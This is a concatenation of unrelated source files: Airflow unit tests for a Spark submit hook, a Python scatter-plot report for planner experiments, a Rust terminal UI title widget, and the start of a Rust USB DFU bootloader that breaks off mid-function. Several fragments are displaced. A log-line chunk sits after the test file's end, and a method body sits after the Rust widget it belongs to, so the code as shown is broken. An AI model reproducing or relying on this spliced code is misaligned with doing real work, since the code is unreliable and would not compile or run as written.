mock_popen): # Given mock_popen.return_value.stdout = io.StringIO('stdout') mock_popen.return_value.stderr = io.StringIO('stderr') mock_popen.return_value.wait.return_value = 0 # When hook = SparkSubmitHook(conn_id='') hook.submit() # Then self.assertEqual(mock_popen.mock_calls[0], call(['spark-submit', '--master', 'yarn', '--name', 'default-name', ''], stderr=-2, stdout=-1, universal_newlines=True, bufsize=-1)) def test_resolve_should_track_driver_status(self): # Given hook_default = SparkSubmitHook(conn_id='') hook_spark_yarn_cluster = SparkSubmitHook(conn_id='spark_yarn_cluster') hook_spark_k8s_cluster = SparkSubmitHook(conn_id='spark_k8s_cluster') hook_spark_default_mesos = SparkSubmitHook(conn_id='spark_default_mesos') hook_spark_home_set = SparkSubmitHook(conn_id='spark_home_set') hook_spark_home_not_set = SparkSubmitHook(conn_id='spark_home_not_set') hook_spark_binary_set = SparkSubmitHook(conn_id='spark_binary_set') hook_spark_binary_and_home_set = SparkSubmitHook( conn_id='spark_binary_and_home_set') hook_spark_standalone_cluster = SparkSubmitHook( conn_id='spark_standalone_cluster') # When should_track_driver_status_default = hook_default \ ._resolve_should_track_driver_status() should_track_driver_status_spark_yarn_cluster = hook_spark_yarn_cluster \ ._resolve_should_track_driver_status() should_track_driver_status_spark_k8s_cluster = hook_spark_k8s_cluster \ ._resolve_should_track_driver_status() should_track_driver_status_spark_default_mesos = hook_spark_default_mesos \ ._resolve_should_track_driver_status() should_track_driver_status_spark_home_set = hook_spark_home_set \ ._resolve_should_track_driver_status() should_track_driver_status_spark_home_not_set = hook_spark_home_not_set \ ._resolve_should_track_driver_status() should_track_driver_status_spark_binary_set = hook_spark_binary_set \ ._resolve_should_track_driver_status() should_track_driver_status_spark_binary_and_home_set = \ hook_spark_binary_and_home_set._resolve_should_track_driver_status() should_track_driver_status_spark_standalone_cluster = \ hook_spark_standalone_cluster._resolve_should_track_driver_status() # Then self.assertEqual(should_track_driver_status_default, False) self.assertEqual(should_track_driver_status_spark_yarn_cluster, False) self.assertEqual(should_track_driver_status_spark_k8s_cluster, False) self.assertEqual(should_track_driver_status_spark_default_mesos, False) self.assertEqual(should_track_driver_status_spark_home_set, False) self.assertEqual(should_track_driver_status_spark_home_not_set, False) self.assertEqual(should_track_driver_status_spark_binary_set, False) self.assertEqual(should_track_driver_status_spark_binary_and_home_set, False) self.assertEqual(should_track_driver_status_spark_standalone_cluster, True) def test_resolve_connection_yarn_default(self): # Given hook = SparkSubmitHook(conn_id='') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then dict_cmd = self.cmd_args_to_dict(cmd) expected_spark_connection = {"master": "yarn", "spark_binary": "spark-submit", "deploy_mode": None, "queue": None, "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(dict_cmd["--master"], "yarn") def test_resolve_connection_yarn_default_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_default') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then dict_cmd = self.cmd_args_to_dict(cmd) expected_spark_connection = {"master": "yarn", "spark_binary": "spark-submit", "deploy_mode": None, "queue": "root.default", "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(dict_cmd["--master"], "yarn") self.assertEqual(dict_cmd["--queue"], "root.default") def test_resolve_connection_mesos_default_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_default_mesos') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then dict_cmd = self.cmd_args_to_dict(cmd) expected_spark_connection = {"master": "mesos://host:5050", "spark_binary": "spark-submit", "deploy_mode": None, "queue": None, "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(dict_cmd["--master"], "mesos://host:5050") def test_resolve_connection_spark_yarn_cluster_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_yarn_cluster') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then dict_cmd = self.cmd_args_to_dict(cmd) expected_spark_connection = {"master": "yarn://yarn-master", "spark_binary": "spark-submit", "deploy_mode": "cluster", "queue": "root.etl", "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(dict_cmd["--master"], "yarn://yarn-master") self.assertEqual(dict_cmd["--queue"], "root.etl") self.assertEqual(dict_cmd["--deploy-mode"], "cluster") def test_resolve_connection_spark_k8s_cluster_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_k8s_cluster') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then dict_cmd = self.cmd_args_to_dict(cmd) expected_spark_connection = {"spark_home": "/opt/spark", "queue": None, "spark_binary": "spark-submit", "master": "k8s://https://k8s-master", "deploy_mode": "cluster", "namespace": "mynamespace"} self.assertEqual(connection, expected_spark_connection) self.assertEqual(dict_cmd["--master"], "k8s://https://k8s-master") self.assertEqual(dict_cmd["--deploy-mode"], "cluster") def test_resolve_connection_spark_home_set_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_home_set') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "yarn://yarn-master", "spark_binary": "spark-submit", "deploy_mode": None, "queue": None, "spark_home": "/opt/myspark", "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], '/opt/myspark/bin/spark-submit') def test_resolve_connection_spark_home_not_set_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_home_not_set') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "yarn://yarn-master", "spark_binary": "spark-submit", "deploy_mode": None, "queue": None, "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], 'spark-submit') def test_resolve_connection_spark_binary_set_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_binary_set') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "yarn", "spark_binary": "custom-spark-submit", "deploy_mode": None, "queue": None, "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], 'custom-spark-submit') def test_resolve_connection_spark_binary_default_value_override(self): # Given hook = SparkSubmitHook(conn_id='spark_binary_set', spark_binary='another-custom-spark-submit') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "yarn", "spark_binary": "another-custom-spark-submit", "deploy_mode": None, "queue": None, "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], 'another-custom-spark-submit') def test_resolve_connection_spark_binary_default_value(self): # Given hook = SparkSubmitHook(conn_id='spark_default') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "yarn", "spark_binary": "spark-submit", "deploy_mode": None, "queue": 'root.default', "spark_home": None, "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], 'spark-submit') def test_resolve_connection_spark_binary_and_home_set_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_binary_and_home_set') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "yarn", "spark_binary": "custom-spark-submit", "deploy_mode": None, "queue": None, "spark_home": "/path/to/spark_home", "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], '/path/to/spark_home/bin/custom-spark-submit') def test_resolve_connection_spark_standalone_cluster_connection(self): # Given hook = SparkSubmitHook(conn_id='spark_standalone_cluster') # When connection = hook._resolve_connection() cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_spark_connection = {"master": "spark://spark-standalone-master:6066", "spark_binary": "spark-submit", "deploy_mode": "cluster", "queue": None, "spark_home": "/path/to/spark_home", "namespace": None} self.assertEqual(connection, expected_spark_connection) self.assertEqual(cmd[0], '/path/to/spark_home/bin/spark-submit') def test_resolve_spark_submit_env_vars_standalone_client_mode(self): # Given hook = SparkSubmitHook(conn_id='spark_standalone_cluster_client_mode', env_vars={"bar": "foo"}) # When hook._build_spark_submit_command(self._spark_job_file) # Then self.assertEqual(hook._env, {"bar": "foo"}) def test_resolve_spark_submit_env_vars_standalone_cluster_mode(self): def env_vars_exception_in_standalone_cluster_mode(): # Given hook = SparkSubmitHook(conn_id='spark_standalone_cluster', env_vars={"bar": "foo"}) # When hook._build_spark_submit_command(self._spark_job_file) # Then self.assertRaises(AirflowException, env_vars_exception_in_standalone_cluster_mode) def test_resolve_spark_submit_env_vars_yarn(self): # Given hook = SparkSubmitHook(conn_id='spark_yarn_cluster', env_vars={"bar": "foo"}) # When cmd = hook._build_spark_submit_command(self._spark_job_file) # Then self.assertEqual(cmd[4], "spark.yarn.appMasterEnv.bar=foo") self.assertEqual(hook._env, {"bar": "foo"}) def test_resolve_spark_submit_env_vars_k8s(self): # Given hook = SparkSubmitHook(conn_id='spark_k8s_cluster', env_vars={"bar": "foo"}) # When cmd = hook._build_spark_submit_command(self._spark_job_file) # Then self.assertEqual(cmd[4], "spark.kubernetes.driverEnv.bar=foo") def test_process_spark_submit_log_yarn(self): # Given hook = SparkSubmitHook(conn_id='spark_yarn_cluster') log_lines = [ 'SPARK_MAJOR_VERSION is set to 2, using Spark2', 'WARN NativeCodeLoader: Unable to load native-hadoop library for your ' + 'platform... using builtin-java classes where applicable', 'WARN DomainSocketFactory: The short-circuit local reads feature cannot ' 'be used because libhadoop cannot be loaded.', 'INFO Client: Requesting a new application from cluster with 10 NodeManagers', 'INFO Client: Submitting application application_1486558679801_1820 ' + 'to ResourceManager' ] # When hook._process_spark_submit_log(log_lines) # Then self.assertEqual(hook._yarn_application_id, 'application_1486558679801_1820') def test_process_spark_submit_log_k8s(self): # Given hook = SparkSubmitHook(conn_id='spark_k8s_cluster') log_lines = [ 'INFO LoggingPodStatusWatcherImpl:54 - State changed, new state:' + 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver' + 'namespace: default' + 'labels: spark-app-selector -> spark-465b868ada474bda82ccb84ab2747fcd,' + 'spark-role -> driver' + 'pod uid: ba9c61f6-205f-11e8-b65f-d48564c88e42' + 'creation time: 2018-03-05T10:26:55Z' + 'service account name: spark' + 'volumes: spark-init-properties, download-jars-volume,' + 'download-files-volume, spark-token-2vmlm' + 'node name: N/A' + 'start time: N/A' + 'container images: N/A' + 'phase: Pending' + 'status: []' + '2018-03-05 11:26:56 INFO LoggingPodStatusWatcherImpl:54 - State changed,' + ' new state:' + 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver' + 'namespace: default' + 'Exit code: 999' ] # When hook._process_spark_submit_log(log_lines) # Then self.assertEqual(hook._kubernetes_driver_pod, 'spark-pi-edf2ace37be7353a958b38733a12f8e6-driver') self.assertEqual(hook._spark_exit_code, 999) def test_process_spark_submit_log_standalone_cluster(self): # Given hook = SparkSubmitHook(conn_id='spark_standalone_cluster') log_lines = [ 'Running Spark using the REST application submission protocol.', '17/11/28 11:14:15 INFO RestSubmissionClient: Submitting a request ' 'to launch an application in spark://spark-standalone-master:6066', '17/11/28 11:14:15 INFO RestSubmissionClient: Submission successfully ' + 'created as driver-20171128111415-0001. Polling submission state...' ] # When hook._process_spark_submit_log(log_lines) # Then self.assertEqual(hook._driver_id, 'driver-20171128111415-0001') def test_process_spark_driver_status_log(self): # Given hook = SparkSubmitHook(conn_id='spark_standalone_cluster') log_lines = [ 'Submitting a request for the status of submission ' + 'driver-20171128111415-0001 in spark://spark-standalone-master:6066', '17/11/28 11:15:37 INFO RestSubmissionClient: Server responded with ' + 'SubmissionStatusResponse:', '{', '"action" : "SubmissionStatusResponse",', '"driverState" : "RUNNING",', '"serverSparkVersion" : "1.6.0",', '"submissionId" : "driver-20171128111415-0001",', '"success" : true,', '"workerHostPort" : "172.18.0.7:38561",', '"workerId" : "worker-20171128110741-172.18.0.7-38561"', '}' ] # When hook._process_spark_status_log(log_lines) # Then self.assertEqual(hook._driver_status, 'RUNNING') @patch('airflow.contrib.hooks.spark_submit_hook.subprocess.Popen') def test_yarn_process_on_kill(self, mock_popen): # Given mock_popen.return_value.stdout = io.StringIO('stdout') mock_popen.return_value.stderr = io.StringIO('stderr') mock_popen.return_value.poll.return_value = None mock_popen.return_value.wait.return_value = 0 log_lines = [ 'SPARK_MAJOR_VERSION is set to 2, using Spark2', 'WARN NativeCodeLoader: Unable to load native-hadoop library for your ' + 'platform... using builtin-java classes where applicable', 'WARN DomainSocketFactory: The short-circuit local reads feature cannot ' + 'be used because libhadoop cannot be loaded.', 'INFO Client: Requesting a new application from cluster with 10 ' + 'NodeManagerapplication_1486558679801_1820s', 'INFO Client: Submitting application application_1486558679801_1820 ' + 'to ResourceManager' ] hook = SparkSubmitHook(conn_id='spark_yarn_cluster') hook._process_spark_submit_log(log_lines) hook.submit() # When hook.on_kill() # Then self.assertIn(call(['yarn', 'application', '-kill', 'application_1486558679801_1820'], stderr=-1, stdout=-1), mock_popen.mock_calls) def test_standalone_cluster_process_on_kill(self): # Given log_lines = [ 'Running Spark using the REST application submission protocol.', '17/11/28 11:14:15 INFO RestSubmissionClient: Submitting a request ' + 'to launch an application in spark://spark-standalone-master:6066', '17/11/28 11:14:15 INFO RestSubmissionClient: Submission successfully ' + 'created as driver-20171128111415-0001. Polling submission state...' ] hook = SparkSubmitHook(conn_id='spark_standalone_cluster') hook._process_spark_submit_log(log_lines) # When kill_cmd = hook._build_spark_driver_kill_command() # Then self.assertEqual(kill_cmd[0], '/path/to/spark_home/bin/spark-submit') self.assertEqual(kill_cmd[1], '--master') self.assertEqual(kill_cmd[2], 'spark://spark-standalone-master:6066') self.assertEqual(kill_cmd[3], '--kill') self.assertEqual(kill_cmd[4], 'driver-20171128111415-0001') @patch('airflow.kubernetes.kube_client.get_kube_client') @patch('airflow.contrib.hooks.spark_submit_hook.subprocess.Popen') def test_k8s_process_on_kill(self, mock_popen, mock_client_method): # Given mock_popen.return_value.stdout = io.StringIO('stdout') mock_popen.return_value.stderr = io.StringIO('stderr') mock_popen.return_value.poll.return_value = None mock_popen.return_value.wait.return_value = 0 client = mock_client_method.return_value hook = SparkSubmitHook(conn_id='spark_k8s_cluster') log_lines = [ 'INFO LoggingPodStatusWatcherImpl:54 - State changed, new state:' + 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver' + 'namespace: default' + 'labels: spark-app-selector -> spark-465b868ada474bda82ccb84ab2747fcd,' + 'spark-role -> driver' + 'pod uid: ba9c61f6-205f-11e8-b65f-d48564c88e42' + 'creation time: 2018-03-05T10:26:55Z' + 'service account name: spark' +
'container images: N/A' + 'phase: Pending' + 'status: []' + '2018-03-05 11:26:56 INFO LoggingPodStatusWatcherImpl:54 - State changed,' + ' new state:' + 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver' + 'namespace: default' + 'Exit code: 0' ] hook._process_spark_submit_log(log_lines) hook.submit() # When hook.on_kill() # Then import kubernetes kwargs = {'pretty': True, 'body': kubernetes.client.V1DeleteOptions()} client.delete_namespaced_pod.assert_called_once_with( 'spark-pi-edf2ace37be7353a958b38733a12f8e6-driver', 'mynamespace', **kwargs) if __name__ == '__main__': unittest.main()
'volumes: spark-init-properties, download-jars-volume,' + 'download-files-volume, spark-token-2vmlm' + 'node name: N/A' + 'start time: N/A' +
relativescatter.py
# -*- coding: utf-8 -*- from collections import defaultdict from matplotlib import ticker from downward.reports.scatter import ScatterPlotReport from downward.reports.plot import PlotReport, Matplotlib, MatplotlibPlot # TODO: handle outliers # TODO: this is mostly copied from ScatterMatplotlib (scatter.py) class RelativeScatterMatplotlib(Matplotlib): @classmethod def _plot(cls, report, axes, categories, styles): # Display grid axes.grid(b=True, linestyle='-', color='0.75') has_points = False # Generate the scatter plots for category, coords in sorted(categories.items()): X, Y = zip(*coords) axes.scatter(X, Y, s=42, label=category, **styles[category]) if X and Y: has_points = True if report.xscale == 'linear' or report.yscale == 'linear': plot_size = report.missing_val * 1.01 else: plot_size = report.missing_val * 1.25 # make 5 ticks above and below 1 yticks = [] tick_step = report.ylim_top**(1/5.0) for i in xrange(-5, 6): yticks.append(tick_step**i) axes.set_yticks(yticks) axes.get_yaxis().set_major_formatter(ticker.ScalarFormatter()) axes.set_xlim(report.xlim_left or -1, report.xlim_right or plot_size) axes.set_ylim(report.ylim_bottom or -1, report.ylim_top or plot_size) for axis in [axes.xaxis, axes.yaxis]: MatplotlibPlot.change_axis_formatter( axis, report.missing_val if report.show_missing else None) return has_points class RelativeScatterPlotReport(ScatterPlotReport):
""" Generate a scatter plot that shows a relative comparison of two algorithms with regard to the given attribute. The attribute value of algorithm 1 is shown on the x-axis and the relation to the value of algorithm 2 on the y-axis. """ def __init__(self, show_missing=True, get_category=None, **kwargs): ScatterPlotReport.__init__(self, show_missing, get_category, **kwargs) if self.output_format == 'tex': raise "not supported" else: self.writer = RelativeScatterMatplotlib def _fill_categories(self, runs): # We discard the *runs* parameter. # Map category names to value tuples categories = defaultdict(list) self.ylim_bottom = 2 self.ylim_top = 0.5 self.xlim_left = float("inf") for (domain, problem), runs in self.problem_runs.items(): if len(runs) != 2: continue run1, run2 = runs assert (run1['algorithm'] == self.algorithms[0] and run2['algorithm'] == self.algorithms[1]) val1 = run1.get(self.attribute) val2 = run2.get(self.attribute) if val1 is None or val2 is None: continue category = self.get_category(run1, run2) assert val1 > 0, (domain, problem, self.algorithms[0], val1) assert val2 > 0, (domain, problem, self.algorithms[1], val2) x = val1 y = val2 / float(val1) categories[category].append((x, y)) self.ylim_top = max(self.ylim_top, y) self.ylim_bottom = min(self.ylim_bottom, y) self.xlim_left = min(self.xlim_left, x) # center around 1 if self.ylim_bottom < 1: self.ylim_top = max(self.ylim_top, 1 / float(self.ylim_bottom)) if self.ylim_top > 1: self.ylim_bottom = min(self.ylim_bottom, 1 / float(self.ylim_top)) return categories def _set_scales(self, xscale, yscale): # ScatterPlot uses log-scaling on the x-axis by default. PlotReport._set_scales( self, xscale or self.attribute.scale or 'log', 'log')
title_line.rs
use ::std::path::PathBuf; use ::tui::buffer::Buffer; use ::tui::layout::Rect; use ::tui::style::{Color, Modifier, Style}; use ::tui::widgets::Widget; use crate::ui::format::DisplaySize; use crate::ui::title::{CellSizeOpt, TitleTelescope}; use crate::ui::FolderInfo; #[cfg(not(target_os = "windows"))] use crate::os::unix::is_user_admin; #[cfg(target_os = "windows")] use crate::os::windows::is_user_admin; pub struct TitleLine<'a> { base_path_info: FolderInfo<'a>, current_path_info: FolderInfo<'a>, space_freed: u128, show_loading: bool, progress_indicator: u64, read_errors: Option<u64>, flash_space: bool, path_error: bool, zoom_level: Option<usize>, } impl<'a> TitleLine<'a> { pub fn new( base_path_info: FolderInfo<'a>, current_path_info: FolderInfo<'a>, space_freed: u128, ) -> Self { Self { base_path_info, current_path_info, space_freed, progress_indicator: 0, read_errors: None, show_loading: false, flash_space: false, path_error: false, zoom_level: None, } } pub fn show_loading(mut self) -> Self { self.show_loading = true; self } pub fn flash_space(mut self, flash_space: bool) -> Self { self.flash_space = flash_space; self } pub fn path_error(mut self, path_error: bool) -> Self { self.path_error = path_error; self } pub fn progress_indicator(mut self, progress_indicator: u64) -> Self { self.progress_indicator = progress_indicator; self } pub fn read_errors(mut self, read_errors: u64) -> Self
pub fn zoom_level(mut self, zoom_level: usize) -> Self { if zoom_level > 0 { self.zoom_level = Some(zoom_level); } self } } impl<'a> Widget for TitleLine<'a> { fn render(self, rect: Rect, buf: &mut Buffer) { let base_path = &self .base_path_info .path .clone() .into_os_string() .into_string() .expect("could not convert os string to string"); let current_path = { let mut current_path_relative_to_base = PathBuf::new(); let base_path_len = self.base_path_info.path.iter().count(); for folder in self.current_path_info.path.iter().skip(base_path_len) { current_path_relative_to_base.push(folder); } current_path_relative_to_base.to_string_lossy().into_owned() }; let separator = if base_path.ends_with(::std::path::MAIN_SEPARATOR) { // eg. if base_path is "/", we don't want current path to // also start with "/" otherwise we'll have "//path_to_my/location" // instead of "/path_to_my/location" format!("") } else { format!("{}", ::std::path::MAIN_SEPARATOR) }; #[cfg(test)] let current_path = str::replace(&current_path, "\\", "/"); #[cfg(test)] let base_path = str::replace(&base_path, "\\", "/"); #[cfg(test)] let separator = str::replace(&separator, "\\", "/"); let total_size = DisplaySize(self.base_path_info.size as f64); let total_descendants = &self.base_path_info.num_descendants; let current_folder_size = DisplaySize(self.current_path_info.size as f64); let current_folder_descendants = self.current_path_info.num_descendants; let space_freed = DisplaySize(self.space_freed as f64); let mut default_style = Style::default().fg(Color::Yellow); if !self.show_loading { default_style = default_style.add_modifier(Modifier::BOLD); }; let mut title_telescope = TitleTelescope::new(default_style); if self.show_loading { title_telescope.append_to_left_side(vec![ CellSizeOpt::new(format!( "Scanning: {} ({} files)", total_size, total_descendants )), CellSizeOpt::new(format!("Scanning: {}", total_size)), CellSizeOpt::new(format!("{}", total_size)), ]); } else { title_telescope.append_to_left_side(vec![ CellSizeOpt::new(format!( "Total: {} ({} files), freed: {}", total_size, total_descendants, space_freed )), CellSizeOpt::new(format!("Total: {}, freed: {}", total_size, space_freed)), CellSizeOpt::new(format!("Total: {}", total_size)), CellSizeOpt::new(format!("{}", total_size)), ]); }; if let Some(read_errors) = self.read_errors { title_telescope.append_to_left_side(vec![ CellSizeOpt::new(format!(" (failed to read {} files)", read_errors)) .style(default_style.fg(Color::Red)), CellSizeOpt::new(format!(" ({} errors)", read_errors)) .style(default_style.fg(Color::Red)), CellSizeOpt::new(" (errors)".to_string()).style(default_style.fg(Color::Red)), ]); } if is_user_admin() { title_telescope.append_to_left_side(vec![ CellSizeOpt::new(format!(" (CAUTION: running as root)")) .style(default_style.fg(Color::Red)), CellSizeOpt::new(format!(" (running as root)")).style(default_style.fg(Color::Red)), CellSizeOpt::new(" (root)".to_string()).style(default_style.fg(Color::Red)), ]); } title_telescope.append_to_right_side(vec![CellSizeOpt::new(base_path.to_string())]); if !current_path.is_empty() { title_telescope.append_to_right_side(vec![ CellSizeOpt::new(format!( "{}{} ({}, {} files)", separator, current_path, current_folder_size, current_folder_descendants )) .style(default_style.fg(Color::Green)), CellSizeOpt::new(format!( "{}{} ({})", separator, current_path, current_folder_size )) .style(default_style.fg(Color::Green)), CellSizeOpt::new(format!("{}{}", separator, current_path)) .style(default_style.fg(Color::Green)), ]); } if let Some(zoom_level) = self.zoom_level { title_telescope.append_to_right_side(vec![ CellSizeOpt::new(format!( " (+{} larger file(s), zoom out to show)", zoom_level )) .style(default_style.fg(Color::Green)), CellSizeOpt::new(format!(" (+{} larger file(s))", zoom_level)) .style(default_style.fg(Color::Green)), ]); } title_telescope .loading(self.show_loading, self.progress_indicator) .path_error(self.path_error) .size_flash(self.flash_space) .render(rect, buf); } }
{ if read_errors > 0 { self.read_errors = Some(read_errors); } self }
dfu.rs
use usb_device::{ class_prelude::*, Result, }; use core::mem; use crate::flash; use crate::flags; use crate::config; use crate::util; use crate::util::LOGGER; use stm32f1xx_hal::{ pac::{FLASH, USART1}, serial::Tx, }; use core::marker::PhantomData; #[allow(dead_code)] pub(crate) const BL_MAGIC: u32 = 0xdeadcafe; // const DFU_AL0: &'static str = "DFU Bootloader 0.2.0"; const CLASS_APPLICATION_SPECIFIC: u8 = 0xfe; const SUBCLASS_DFU: u8 = 0x01; const PROTOCOL_DFU_MODE: u8 = 0x02; const DESC_DFU_FUNCTIONAL: u8 = 0x21; #[allow(unused)] pub(crate) mod dfu_request { pub const DFU_DETACH: u8 = 0; // proto 1 pub const DFU_DNLOAD: u8 = 1; // proto 2 pub const DFU_UPLOAD: u8 = 2; // proto 2 pub const DFU_GETSTATUS: u8 = 3; // proto 1/2 pub const DFU_CLRSTATUS: u8 = 4; // proto 2 pub const DFU_GETSTATE: u8 = 5; // proto 1/2 pub const DFU_ABORT: u8 = 6; // proto 2 } #[allow(unused)] #[derive(Copy, Clone)] pub(crate) enum DfuState { AppIdle, AppDetach, DfuIdle, DfuDnloadSync, DfuDnloadBusy, DfuDnloadIdle, DfuManifestSync, DfuManifest, DfuManifestWaitReset, DfuUploadIdle, DfuError, } // todo: make all these useful #[allow(unused)] #[derive(Copy, Clone)] pub(crate) enum DfuDeviceStatus { Ok, // No error condition is present. ErrTarget, // File is not targeted for use by this device. ErrFile, // File is for this device but fails some vendor-specific verification test. ErrWrite, // Device is unable to write memory. ErrErase, // Memory erase function failed. ErrCheckErased, // Memory erase check failed ErrProg, // Program memory function failed. ErrVerify, // Programmed memory failed verification. ErrAddress, // Cannot program memory due to received address that is out of range. ErrNotDone, // Received DFU_DNLOAD with wLength = 0, but device does not think it has all of the data yet. ErrFirmware, // Device’s firmware is corrupt. It cannot return to run-time (non-DFU) operations. ErrVendor, // iString indicates a vendor-specific error. ErrUsbR, // Device detected unexpected USB reset signaling. ErrPoR, // Device detected unexpected power on reset. ErrUnknown, // Something went wrong, but the device does not know what it was. ErrStaledPkt, // Device stalled an unexpected request. } const BIGGEST_PAGE: usize = 2048; pub struct Dfu<'a, B: UsbBus> { woosh: PhantomData<B>, comm_if: InterfaceNumber, def_str: StringIndex, upload_capable: bool, download_capable: bool, state: DfuState, status: DfuDeviceStatus, firmware_size: usize, awaits_flash: bool, flashing: bool, manifesting: bool, page_buffer: [u8; BIGGEST_PAGE], page_buffer_index: usize, flags: core::option::Option<&'a flags::BlFlags>, } impl<B: UsbBus> Dfu<'_, B> { pub fn new(alloc: &UsbBusAllocator<B>, download_capable: bool, tx: Option<Tx<USART1>>) -> Dfu<'_, B> { unsafe { LOGGER = tx } let flags = flags::read_bl_flags(); Dfu { woosh: PhantomData, comm_if: alloc.interface(), def_str: alloc.string(), upload_capable: false, download_capable: download_capable, state: DfuState::DfuIdle, status: DfuDeviceStatus::Ok, firmware_size: 0, awaits_flash: false, flashing: false, manifesting: false, page_buffer: unsafe { mem::zeroed() }, page_buffer_index: 0, flags: flags, } } pub fn flags(&self) -> core::option::Option<&'_ flags::BlFlags> { self.flags } pub fn process_flash(&mut self) { if self.awaits_flash && !self.flashing { self.flashing = true; cortex_m::interrupt::free(|_| { unsafe { let mut addr: u32 = flash::PAGE_START + self.firmware_size as u32; flash::erase_page(addr); let n: usize = (self.page_buffer_index) / 4; for i in 0..n { let d: u32 = u32::from_le_bytes( [self.page_buffer[i*4], self.page_buffer[(i*4)+1], self.page_buffer[(i*4)+2], self.page_buffer[(i*4)+3]]); match flash::write_word(addr, d) { Ok(_) => { self.status = DfuDeviceStatus::Ok; addr += 4; }, Err(_) => { util::_log_fmt(format_args!("Write failed on i: {} addr: 0x{:x} sr: 0x{:x}\r\n", i, addr, &(*(FLASH::ptr())).sr.read().bits())); self.status = DfuDeviceStatus::ErrWrite; self.page_buffer_index = 0; self.awaits_flash = false; self.flashing = false; return; }, } } self.firmware_size += self.page_buffer_index; self.page_buffer_index = 0; } }); self.awaits_flash = false; self.flashing = false; } else if self.manifesting && !self.flashing { self.flashing = true; let flash_count: u32 = match self.flags() { Some(flags) => flags.flash_count+1, None => 1, }; let flags = &flags::BlFlags { magic: BL_MAGIC, flash_count: flash_count, user_code_legit: true, user_code_present: true, user_code_length: self.firmware_size as u32, }; flags::write_bl_flags(flags); self.flags = flags::read_bl_flags(); unsafe { flash::lock_flash(); } self.manifesting = false; self.flashing = false; } } } impl<B:UsbBus> UsbClass<B> for Dfu<'_, B> { fn get_bos_descriptors(&self, w: &mut BosWriter) -> Result<()> { w.capability(0x05, &[ 0x0, 0xDF, 0x60, 0xDD, 0xD8, // MS OS 2.0 Platform Capability ID 0x89, 0x45, 0xC7, 0x4C, 0x9C, 0xD2, 0x65, 0x9D, 0x9E, 0x64, 0x8A, 0x9F, 0x0, 0x0, 0x03, 0x06, // Windows Version 0xB2, 0x00, 0x21, 0x00 ]) } fn get_configuration_descriptors(&self, writer: &mut DescriptorWriter) -> Result<()> { writer.interface_alt(self.comm_if, 0, CLASS_APPLICATION_SPECIFIC, SUBCLASS_DFU, PROTOCOL_DFU_MODE, Some(self.def_str))?; writer.write(DESC_DFU_FUNCTIONAL, &[ 0x4 // manifestation tolerant | if self.upload_capable { 0x02 } else { 0x00 } | if self.download_capable { 0x01 } else { 0x00 }, //bmAttributes 255, 0, // wDetachTimeout //(page_size & 0xff) as u8, //((page_size >> 8) & 0xff) as u8, // wTransferSize 0x00, 0x01, // 256 bytes max 0x10, 0x01, // bcdDFUVersion ])?; Ok(()) } fn get_string(&self, index: StringIndex, _lang_id: u16) -> Option<&str> { if index == self.def_str { Some(config::DFU_AL0) } else { None } } fn control_in(&mut self, xfer: ControlIn<B>) { let req = *xfer.request(); if !(req.request_type == control::RequestType::Class && req.recipient == control::Recipient::Interface && req.index == u8::from(self.comm_if) as u16) { return; } fn accept_status<B: UsbBus> (xfer: ControlIn<B>, c: &Dfu<B>, wait_time_ms: u32) { xfer.accept_with(&[ c.status as u8, (wait_time_ms & 0xff) as u8, ((wait_time_ms >> 8) & 0xff) as u8, ((wait_time_ms >> 16) & 0xff) as u8, c.state as u8, 0, ]).ok(); } match self.status { DfuDeviceStatus::Ok => {}, _ => { self.state = DfuState::DfuError; }, } match self.state { DfuState::DfuDnloadBusy => { if !self.awaits_flash { self.state = DfuState::DfuDnloadSync; } }, _ => {}, } match req.request { dfu_request::DFU_UPLOAD if req.value == 0 && req.length > 0 && self.upload_capable => { }, dfu_request::DFU_GETSTATUS if req.value == 0 && req.length == 6 => { match self.state { DfuState::DfuDnloadSync => { if self.awaits_flash { self.state = DfuState::DfuDnloadBusy; } else { self.state = DfuState::DfuDnloadIdle; } self.status = DfuDeviceStatus::Ok; accept_status(xfer, &self, 0); }, DfuState::DfuDnloadBusy => { self.state 